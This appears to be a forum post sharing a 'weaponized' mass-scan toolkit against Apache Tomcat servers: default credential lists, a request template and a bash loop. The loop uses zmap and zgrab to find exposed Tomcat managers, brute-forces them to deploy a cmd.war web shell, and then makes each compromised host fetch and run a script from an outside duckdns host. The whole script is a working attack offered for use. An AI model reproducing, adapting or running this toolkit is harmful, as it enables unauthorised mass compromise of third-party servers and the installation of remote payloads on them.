Mass scan weaponized tomcat exploit pt3 (final).

[soosef]

Link:
file: username.txt
root
role
admin
tomcat
test
user
file: password.txt
password
adminadmin
admin
tomcat
test
user
file: my_req

GET /manager/html HTTP/1.1
Host: %d
Connection: close
User_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
file: scan.sh

Bash:

#!/bin/bash
for (( ; ; ))
do
if ls *.zone &>/dev/null
then
echo "Found."
else
wget https://cdn.discordapp.com/attachments/716135473373773854/793328005635244032/amazon.zone -O slaaaa.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793353236819083274/1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360506889961522/amazon_1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360510225350666/amazon.zone -O slaaaaa.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360512590807040/ama.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360513261109278/amazon_2_1.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360515728015380/amazon_2.zone
wget https://cdn.discordapp.com/attachments/716135473373773854/793360516725997608/1_1.zone
fi
rm -rf ok.csv result.txt tom.txt tom2.txt file.txt done1.txt supra.txt up.txt l
for i in *.zone
do zmap -p 8080 -w $i -o file.txt -i eth0 -B35M
pkill -9 zmap
rm -rf $i
zgrab --port 8080 --input-file file.txt --data my_req --output-file ok.csv
pkill -9 zgrab
rm -rf file.txt
cat ok.csv | grep "Tomcat" | grep "401" >> l
tr '"' ' ' < l > supra.txt
rm -rf l ok.csv
awk '{ print $4 }' supra.txt >> done1.txt
python w00t3r.py -h done1.txt -p 8080 -m 50 -t 10
awk '{ print $2 }' result.txt >> tom.txt
rm -rf result.txt done1.txt supra.txt
while read -r line
do
timeout 60 python tomcatWarDeployer.py $line -U admin -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U root -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P admin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P password -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P adminadmin -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P tomcat -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P test -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -P user -f cmd.war
timeout 60 python tomcatWarDeployer.py $line -U role -f cmd.war
done < tom.txt
tr '/' ' ' < tom.txt > tom2.txt
awk '{ print "http://"$2"/jsp_app/cmd.jsp" }' tom2.txt >> up.txt
rm -rf tom.txt tom2.txt
while read -r lineup
do
timeout 30 curl --data 'cmd=curl http://darklings.duckdns.org/waraz.sh -o /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=wget http://darklings.duckdns.org/waraz.sh -O /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=chmod 777 /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=sh /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=rm -rf /var/tmp/wazrrrzin.sh' $lineup
timeout 30 curl --data 'cmd=rm -rf /var/tmp/wazrrrzin.sh.1' $lineup
done < up.txt
rm -rf up.txt
done
done

[Paste your content here. Remove this line and one below!]
[DO NOT PASTE THE CONTENT ABOVE OR BELOW THE REPLY QUOTES]